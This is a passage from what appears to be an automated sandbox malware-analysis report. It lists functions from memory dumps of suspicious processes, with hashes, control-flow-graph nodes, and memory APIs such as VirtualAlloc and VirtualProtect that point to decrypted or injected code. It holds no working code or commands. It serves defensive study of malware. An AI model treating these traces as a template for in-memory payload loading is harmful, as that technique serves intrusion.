                                                                                                      • Opcode Fuzzy Hash: 40517fb8d16cbfe7a24ce3e6b771b1e2ebf1a47a8181be54e30d15a99c918e56
                                                                                                      • Instruction Fuzzy Hash: A8E0D83284E28D4FE361676088751D43F90FF05300F4605BAE04C860E3DA1C5558CB42
                                                                                                      Function 00007FFD9B8CFF31 Relevance: .0, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8ca000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 795859b2f715cd2134f1e1fc6bf707cbce527e26a7a8098d1aa8459a9cdf60c2
                                                                                                      • Instruction ID: 4c8b7d6f1b72cc6aae44252de80415970d62f31d58acef6bfe0cb0257a8745fa
                                                                                                      • Opcode Fuzzy Hash: 795859b2f715cd2134f1e1fc6bf707cbce527e26a7a8098d1aa8459a9cdf60c2
                                                                                                      • Instruction Fuzzy Hash: 84D02BA1F1494F47FB18EBC0C821ABD2F62EF10384F400034D46AAE1E9CF242D074780
                                                                                                      Function 00007FFD9B8C6047 Relevance: .0, Instructions: 15COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 79f470d096b330c2203ad7c464ac222eeeebf76ef7556000708742e14b1b2ac6
                                                                                                      • Instruction ID: f9f77a9938d04498ca86eed2b8835a1281cd8b5d351896c65c88458783bd07d9
                                                                                                      • Opcode Fuzzy Hash: 79f470d096b330c2203ad7c464ac222eeeebf76ef7556000708742e14b1b2ac6
                                                                                                      • Instruction Fuzzy Hash: 66D0ECA0D09A998BDBA9EB5488757ACA6A4FB18700F0102FAA04DD2282DB341A808B01
                                                                                                      Function 00007FFD9B9060E9 Relevance: .0, Instructions: 13COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction ID: 80033d7110217501d2c5219ec31fb2c9294cd2d12766bb1716a1a0bceb8d751a
                                                                                                      • Opcode Fuzzy Hash: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction Fuzzy Hash: B3D05EB5E19B1E9FEBA0DE58409835473A1FF14310F4200BD948893062DF385911DF00

                                                                                                      Non-executed Functions

                                                                                                      Function 00007FFD9B8C68B6 Relevance: 6.5, Strings: 5, Instructions: 280COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$)$+$`
                                                                                                      • API String ID: 0-1941960537
                                                                                                      • Opcode ID: a8f2f6f5273c2530670f8555fa323d56958ad2b24474c7ab9ab8ddcb7252815d
                                                                                                      • Instruction ID: fde7038374f8658dadeaf5cad069b5ef44a7d32096f5591bdbac845d3f2e88e6
                                                                                                      • Opcode Fuzzy Hash: a8f2f6f5273c2530670f8555fa323d56958ad2b24474c7ab9ab8ddcb7252815d
                                                                                                      • Instruction Fuzzy Hash: A2C1FF70A1952D8FDB65EB64C8A4BE9B3B2FF98304F5045F9C01D97295CE35AA81CF40
                                                                                                      Function 00007FFD9B8FEE8B Relevance: 6.4, Strings: 5, Instructions: 114COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+$E$H$n
                                                                                                      • API String ID: 0-1773399086
                                                                                                      • Opcode ID: b92fa20d0e33e7ee30e494b060d715ba01ea5247e660b250292986b23f006ede
                                                                                                      • Instruction ID: fad5effcc537e4d61301350cd54ba5c28f9190b52e3324ec2bede60a6548f3e4
                                                                                                      • Opcode Fuzzy Hash: b92fa20d0e33e7ee30e494b060d715ba01ea5247e660b250292986b23f006ede
                                                                                                      • Instruction Fuzzy Hash: FD51F970A0962D8FEB64DF54C8547A8B7F2FB98311F1046FAD10D97292CB356E858F41
                                                                                                      Function 00007FFD9B8FF29E Relevance: 5.0, Strings: 4, Instructions: 39COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$j$u$}
                                                                                                      • API String ID: 0-684171762
                                                                                                      • Opcode ID: 90fa9120faf88389986ca1b88ae63c0967aa7329a4981164fc332c6a114206ae
                                                                                                      • Instruction ID: 34ca5ccaa11eb680f6c219e8c731dc8318f8c0114120c641a44cef2eabc319bc
                                                                                                      • Opcode Fuzzy Hash: 90fa9120faf88389986ca1b88ae63c0967aa7329a4981164fc332c6a114206ae
                                                                                                      • Instruction Fuzzy Hash: 2C113030B0922D8FDB64CF54C9987E9B7F2EF98310F1082A5C10D562A5CB346E85CF81

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.5%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:7
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 19406 7ffd9b8a17ce 19407 7ffd9b8a17dd VirtualProtect 19406->19407 19409 7ffd9b8a191d 19407->19409 19410 7ffd9b8a31bd 19411 7ffd9b8a3171 19410->19411 19412 7ffd9b8a31db VirtualAlloc 19410->19412 19414 7ffd9b8a32f5 19412->19414

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B8AAEFD Relevance: 4.3, Strings: 1, Instructions: 3027COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8aa000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: qL_H
                                                                                                      • API String ID: 0-3462653048
                                                                                                      • Opcode ID: 8af6ad81cd494e00dd686fdb93b0a2ea1ce092c94b905353a75867cbafbf9791
                                                                                                      • Instruction ID: 9639991461e7b923bb8a772302fa4bd2a6cef4cc2c05bb7bc3d0268386b9cf67
                                                                                                      • Opcode Fuzzy Hash: 8af6ad81cd494e00dd686fdb93b0a2ea1ce092c94b905353a75867cbafbf9791
                                                                                                      • Instruction Fuzzy Hash: 8043FC70E0995D8FDBA8EB58C8A5BA9B7B1FF58300F1442E9D00DD3296DA356E81CF50
                                                                                                      Function 00007FFD9B89EC39 Relevance: 2.3, Strings: 1, Instructions: 1064COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 500 7ffd9b89ec39-7ffd9b89ec5c 502 7ffd9b89eca6-7ffd9b89ecbc 500->502 503 7ffd9b89ec5e-7ffd9b89ec8d 500->503 506 7ffd9b89ecc2-7ffd9b89ee79 502->506 507 7ffd9b89f4a1-7ffd9b89f4d9 502->507 504 7ffd9b89ec8f 503->504 505 7ffd9b89ec94-7ffd9b89eca5 503->505 504->505 505->502 548 7ffd9b89ee7f-7ffd9b89ef11 506->548 549 7ffd9b89f484-7ffd9b89f4a0 call 7ffd9b89fe91 506->549 512 7ffd9b89fe72-7ffd9b89fe7f 507->512 513 7ffd9b89fe85-7ffd9b89fe90 512->513 514 7ffd9b89f4de-7ffd9b89f4ed 512->514 515 7ffd9b89f4ef 514->515 516 7ffd9b89f4f4-7ffd9b89f616 514->516 515->516 534 7ffd9b89f61c-7ffd9b89f65e 516->534 539 7ffd9b89f660-7ffd9b89f6cd 534->539 540 7ffd9b89f6d2-7ffd9b89f772 534->540 556 7ffd9b89fe6a-7ffd9b89fe6f 539->556 557 7ffd9b89f774-7ffd9b89f7e1 540->557 558 7ffd9b89f7e3-7ffd9b89f82b 540->558 554 7ffd9b89ef1b-7ffd9b89ef24 548->554 555 7ffd9b89ef13-7ffd9b89ef18 548->555 549->507 560 7ffd9b89f364-7ffd9b89f36a 554->560 555->554 556->512 584 7ffd9b89f836-7ffd9b89f83c 557->584 558->584 561 7ffd9b89ef29-7ffd9b89ef46 560->561 562 7ffd9b89f370-7ffd9b89f397 560->562 568 7ffd9b89ef48-7ffd9b89ef4c 561->568 569 7ffd9b89efaf-7ffd9b89efc6 561->569 564 7ffd9b89f398-7ffd9b89f3ba 562->564 576 7ffd9b89f3bc-7ffd9b89f3f6 564->576 568->569 570 7ffd9b89ef4e-7ffd9b89ef57 568->570 572 7ffd9b89efc8 569->572 573 7ffd9b89efcd-7ffd9b89efe9 569->573 575 7ffd9b89efa1-7ffd9b89efa7 570->575 572->573 578 7ffd9b89efeb 573->578 579 7ffd9b89eff0-7ffd9b89f00d 573->579 582 7ffd9b89ef59-7ffd9b89ef5d 575->582 583 7ffd9b89efa9-7ffd9b89efaa 575->583 608 7ffd9b89f401-7ffd9b89f415 576->608 578->579 580 7ffd9b89f00f 579->580 581 7ffd9b89f014-7ffd9b89f02f 579->581 580->581 587 7ffd9b89f036-7ffd9b89f040 581->587 588 7ffd9b89f031 581->588 585 7ffd9b89ef68-7ffd9b89ef84 582->585 586 7ffd9b89ef5f-7ffd9b89ef65 582->586 589 7ffd9b89f043-7ffd9b89f18c 583->589 592 7ffd9b89f8be-7ffd9b89f8cb 584->592 593 7ffd9b89ef86 585->593 594 7ffd9b89ef8b-7ffd9b89ef9e 585->594 586->585 587->589 588->587 595 7ffd9b89f1a7-7ffd9b89f226 589->595 596 7ffd9b89f18e-7ffd9b89f1a1 589->596 600 7ffd9b89f841-7ffd9b89f868 592->600 601 7ffd9b89f8d1-7ffd9b89f913 592->601 593->594 594->575 598 7ffd9b89f228-7ffd9b89f244 595->598 599 7ffd9b89f27f-7ffd9b89f286 595->599 596->595 606 7ffd9b89f246-7ffd9b89f24a 598->606 607 7ffd9b89f2b7-7ffd9b89f2ce 598->607 602 7ffd9b89f288 599->602 603 7ffd9b89f28d-7ffd9b89f2a6 599->603 604 7ffd9b89f86a 600->604 605 7ffd9b89f86f-7ffd9b89f8bb 600->605 601->556 602->603 609 7ffd9b89f2a9-7ffd9b89f2af 603->609 604->605 605->592 606->607 612 7ffd9b89f24c-7ffd9b89f25b 606->612 610 7ffd9b89f2d5-7ffd9b89f2ef 607->610 611 7ffd9b89f2d0 607->611 613 7ffd9b89f46e-7ffd9b89f474 608->613 615 7ffd9b89f25d-7ffd9b89f261 609->615 616 7ffd9b89f2b1-7ffd9b89f2b2 609->616 620 7ffd9b89f2f6-7ffd9b89f319 610->620 621 7ffd9b89f2f1 610->621 611->610 612->609 617 7ffd9b89f476-7ffd9b89f47d 613->617 618 7ffd9b89f417-7ffd9b89f46b 613->618 626 7ffd9b89f275-7ffd9b89f27c 615->626 627 7ffd9b89f263-7ffd9b89f272 615->627 623 7ffd9b89f35c-7ffd9b89f361 616->623 617->549 618->613 624 7ffd9b89f31b 620->624 625 7ffd9b89f320-7ffd9b89f343 620->625 621->620 623->560 624->625 629 7ffd9b89f345 625->629 630 7ffd9b89f34a-7ffd9b89f35a 625->630 626->599 627->626 629->630 630->623
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: f93b8383cad2bf71d6c53e5ccc60a2bc39152d11b59a23e32e931b7b8f980913
                                                                                                      • Instruction ID: c74a1b2d8420a222af52bb0ca041d4c53c15da5ef9835f28172fcca366aa8b51
                                                                                                      • Opcode Fuzzy Hash: f93b8383cad2bf71d6c53e5ccc60a2bc39152d11b59a23e32e931b7b8f980913
                                                                                                      • Instruction Fuzzy Hash: 26A29470E09A1D8FDFA9DF58C895BA8BBB1FF59304F1041A9D01DE7265DA34AA81CF00
                                                                                                      Function 00007FFD9B8D91CD Relevance: 1.8, Strings: 1, Instructions: 520COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 634 7ffd9b8d91cd-7ffd9b8d91ec 636 7ffd9b8d9236-7ffd9b8d92c5 634->636 637 7ffd9b8d91ee-7ffd9b8d9222 634->637 641 7ffd9b8d92c7-7ffd9b8d92cc 636->641 642 7ffd9b8d92cf-7ffd9b8d92d8 636->642 638 7ffd9b8d9229-7ffd9b8d9233 637->638 639 7ffd9b8d9224 637->639 638->636 639->638 641->642 643 7ffd9b8d9750-7ffd9b8d9756 642->643 644 7ffd9b8d975c-7ffd9b8d9775 643->644 645 7ffd9b8d92dd-7ffd9b8d9307 643->645 646 7ffd9b8d9309 645->646 647 7ffd9b8d930e-7ffd9b8d9327 645->647 646->647 648 7ffd9b8d9329 647->648 649 7ffd9b8d932e-7ffd9b8d9348 647->649 648->649 651 7ffd9b8d934a 649->651 652 7ffd9b8d934f-7ffd9b8d9367 649->652 651->652 653 7ffd9b8d9369 652->653 654 7ffd9b8d936e-7ffd9b8d938f 652->654 653->654 655 7ffd9b8d9391-7ffd9b8d9395 654->655 656 7ffd9b8d93fd-7ffd9b8d941a 654->656 655->656 659 7ffd9b8d9397-7ffd9b8d93ab 655->659 657 7ffd9b8d941c 656->657 658 7ffd9b8d9421-7ffd9b8d943a 656->658 657->658 660 7ffd9b8d943c 658->660 661 7ffd9b8d9441-7ffd9b8d945b 658->661 662 7ffd9b8d93ef-7ffd9b8d93f5 659->662 660->661 665 7ffd9b8d9462-7ffd9b8d947a 661->665 666 7ffd9b8d945d 661->666 663 7ffd9b8d93f7-7ffd9b8d93f8 662->663 664 7ffd9b8d93ad-7ffd9b8d93b1 662->664 669 7ffd9b8d948e-7ffd9b8d9590 663->669 670 7ffd9b8d93bc-7ffd9b8d93d2 664->670 671 7ffd9b8d93b3-7ffd9b8d93b9 664->671 667 7ffd9b8d947c 665->667 668 7ffd9b8d9481-7ffd9b8d948b 665->668 666->665 667->668 668->669 674 7ffd9b8d95a5-7ffd9b8d9612 669->674 675 7ffd9b8d9592-7ffd9b8d95a2 669->675 672 7ffd9b8d93d9-7ffd9b8d93ec 670->672 673 7ffd9b8d93d4 670->673 671->670 672->662 673->672 676 7ffd9b8d966b-7ffd9b8d966f 674->676 677 7ffd9b8d9614-7ffd9b8d962d 674->677 675->674 680 7ffd9b8d9676-7ffd9b8d968f 676->680 681 7ffd9b8d9671 676->681 678 7ffd9b8d96a0-7ffd9b8d96b7 677->678 679 7ffd9b8d962f-7ffd9b8d9633 677->679 683 7ffd9b8d96b9 678->683 684 7ffd9b8d96be-7ffd9b8d96d8 678->684 679->678 685 7ffd9b8d9635-7ffd9b8d9644 679->685 682 7ffd9b8d9692-7ffd9b8d9698 680->682 681->680 686 7ffd9b8d969a-7ffd9b8d969b 682->686 687 7ffd9b8d9646-7ffd9b8d964a 682->687 683->684 688 7ffd9b8d96da 684->688 689 7ffd9b8d96df-7ffd9b8d9703 684->689 685->682 690 7ffd9b8d9748-7ffd9b8d974d 686->690 693 7ffd9b8d964c-7ffd9b8d965b 687->693 694 7ffd9b8d965e-7ffd9b8d9665 687->694 688->689 691 7ffd9b8d970a-7ffd9b8d972e 689->691 692 7ffd9b8d9705 689->692 690->643 695 7ffd9b8d9735-7ffd9b8d9746 691->695 696 7ffd9b8d9730 691->696 692->691 693->694 694->676 695->690 696->695
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: 3c31fd111ae200df23ac94c9406feddbc0544f0cb7668a7422b3148fab796af1
                                                                                                      • Instruction ID: e26107d2885cdce4e7fab801f46264d704dd0565b5a29f99b1995e7664c07314
                                                                                                      • Opcode Fuzzy Hash: 3c31fd111ae200df23ac94c9406feddbc0544f0cb7668a7422b3148fab796af1
                                                                                                      • Instruction Fuzzy Hash: 7C221970E0461D8FDB58DFA8C495AEDBBF1FF88300F14866AD419EB256DA34A981CF50
                                                                                                      Function 00007FFD9B8E4164 Relevance: 1.6, Strings: 1, Instructions: 374COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 6fd3507669cfe1205758f329203574e5925d9c6a87509aa9b866f77b8998a79b
                                                                                                      • Instruction ID: 6c8232963f899aca08c936021de4d823757f5d8f56f4360704cea8fbb59a29fa
                                                                                                      • Opcode Fuzzy Hash: 6fd3507669cfe1205758f329203574e5925d9c6a87509aa9b866f77b8998a79b
                                                                                                      • Instruction Fuzzy Hash: 37F1DB70E1965D8FDBA8EB58C8A5BA8B7F1FF58300F1541BAD40DD72A1DB746A80CB40
                                                                                                      Function 00007FFD9B890DA0 Relevance: .3, Instructions: 293COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 899 7ffd9b890da0-7ffd9b890db7 900 7ffd9b890db9 899->900 901 7ffd9b890dba-7ffd9b890df9 899->901 900->901 902 7ffd9b890dfb 901->902 903 7ffd9b890e00-7ffd9b890eb7 call 7ffd9b8907d0 901->903 902->903 916 7ffd9b890eb9-7ffd9b890ece 903->916 917 7ffd9b890ecf-7ffd9b890fa8 903->917 916->917 930 7ffd9b890faa-7ffd9b890fbe 917->930 931 7ffd9b890fc0-7ffd9b890fe3 917->931 930->931 934 7ffd9b890feb-7ffd9b8910dc 931->934
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83cba7eb26993aa3ba5471442fbe7b1fd51d1772b635ee0e385ec257dcf5dbab
                                                                                                      • Instruction ID: 131a27fdcdb5cd95db0c95138963aaedf03bc30319fd3f73c5d822c409a17696
                                                                                                      • Opcode Fuzzy Hash: 83cba7eb26993aa3ba5471442fbe7b1fd51d1772b635ee0e385ec257dcf5dbab
                                                                                                      • Instruction Fuzzy Hash: 96A1D1B1A18A4D8FE798EB6CD8657A9BFE1FF59310F4001BED049D32E6DB7828418741
                                                                                                      Function 00007FFD9B8A5F66 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 480 7ffd9b8a5f66-7ffd9b8a5f99 482 7ffd9b8a5fa3-7ffd9b8a5fbb 480->482 483 7ffd9b8a5fc6-7ffd9b8a5fcd 482->483 484 7ffd9b8a5fed-7ffd9b8a6783 483->484 485 7ffd9b8a5fcf-7ffd9b8a66d7 483->485 484->483 485->483 492 7ffd9b8a66dd-7ffd9b8a66e7 485->492 492->483
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$pQ_H
                                                                                                      • API String ID: 0-2878190000
                                                                                                      • Opcode ID: 97a6a9b893856734b7e6e931502e15d25bba9b0c27a80de55de87967e49dd7d8
                                                                                                      • Instruction ID: 961c4ff1ac43a72e52fddb60d42a5336ad17c90a4840ea2a67d468439db47fab
                                                                                                      • Opcode Fuzzy Hash: 97a6a9b893856734b7e6e931502e15d25bba9b0c27a80de55de87967e49dd7d8
                                                                                                      • Instruction Fuzzy Hash: EB11E974A0A61D8BDBA4DB58C9A47E8B7B1EB4C300F1141A9E40EE7295CE386B81CB40
                                                                                                      Function 00007FFD9B89AE5E Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 493 7ffd9b89ae5e-7ffd9b89ae72 494 7ffd9b89ae7c-7ffd9b89ae89 493->494 495 7ffd9b898ba8-7ffd9b898bfd 494->495 496 7ffd9b89ae8f-7ffd9b89aebf 494->496
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B896000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B896000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b896000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150
                                                                                                      • Opcode ID: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction ID: 04ac96ffecb3e38fa08bffd77ba01386b9c7834c915d8ede355b608c78ca42ef
                                                                                                      • Opcode Fuzzy Hash: 9fd6aebf94105a3c3630c1fe5b4233f2709ee1ad4ebddc075256b72939c93031
                                                                                                      • Instruction Fuzzy Hash: BF11CB70E0A52E9EEBB4AB58C8587E9B6B0EF08301F1140F9D45DA2291DB781AC48F02
                                                                                                      Function 00007FFD9B8A17CE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 697 7ffd9b8a17ce-7ffd9b8a17db 698 7ffd9b8a17e6-7ffd9b8a17f7 697->698 699 7ffd9b8a17dd-7ffd9b8a17e5 697->699 700 7ffd9b8a17f9-7ffd9b8a1801 698->700 701 7ffd9b8a1802-7ffd9b8a191b VirtualProtect 698->701 699->698 700->701 706 7ffd9b8a191d 701->706 707 7ffd9b8a1923-7ffd9b8a1973 701->707 706->707
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a1000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: ab8c607a2d3db249cedfb3d0b72c9439150f1588517e9b4c56ee585c2ccedb27
                                                                                                      • Instruction ID: 9787d87d8d785958e43ab49f65f213f71dbd4e87d747905afc34c31cd9d7d431
                                                                                                      • Opcode Fuzzy Hash: ab8c607a2d3db249cedfb3d0b72c9439150f1588517e9b4c56ee585c2ccedb27
                                                                                                      • Instruction Fuzzy Hash: 4D516C70D0864D8FDB58DFA8C885BEDBBF1FB5A310F1042AAD449E7251DB74A885CB41
                                                                                                      Function 00007FFD9B8A31BD Relevance: 1.5, APIs: 1, Instructions: 222memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 794 7ffd9b8a31bd-7ffd9b8a31d9 795 7ffd9b8a31db-7ffd9b8a32f3 VirtualAlloc 794->795 796 7ffd9b8a3171-7ffd9b8a31ba 794->796 802 7ffd9b8a32f5 795->802 803 7ffd9b8a32fb-7ffd9b8a335f 795->803 802->803
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a1000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: b6dae74c2d512ddee643fddd7429862c324b205fcc5ef0902e90c03f5ea1dd20
                                                                                                      • Instruction ID: 03ffe579b9774775c568930640e1260a4f4fabe46fd820654bda3688b425991c
                                                                                                      • Opcode Fuzzy Hash: b6dae74c2d512ddee643fddd7429862c324b205fcc5ef0902e90c03f5ea1dd20
                                                                                                      • Instruction Fuzzy Hash: B5613A70908A5C8FDF94EF68D885BE9BBF1FB69310F1041AAD44DE3255DB30A985CB80
                                                                                                      Function 00007FFD9B8E11D8 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 806 7ffd9b8e11d8-7ffd9b8e122e
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2I_^
                                                                                                      • API String ID: 0-3051185169
                                                                                                      • Opcode ID: 743a8b81071c1cd5a1f5a417eccd533c040f1cf96133b2d92177ec3ac28fc004
                                                                                                      • Instruction ID: 115be67a7ecdbc7d71e35d73c3915541b33376dced63d6c3640f7e82fafbd0af
                                                                                                      • Opcode Fuzzy Hash: 743a8b81071c1cd5a1f5a417eccd533c040f1cf96133b2d92177ec3ac28fc004
                                                                                                      • Instruction Fuzzy Hash: 4211D272A085298FDB4AFF68A8A59E97BA0EF45318F0440B7E05DC7197DE34A542C780
                                                                                                      Function 00007FFD9B8DC45D Relevance: .4, Instructions: 440COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
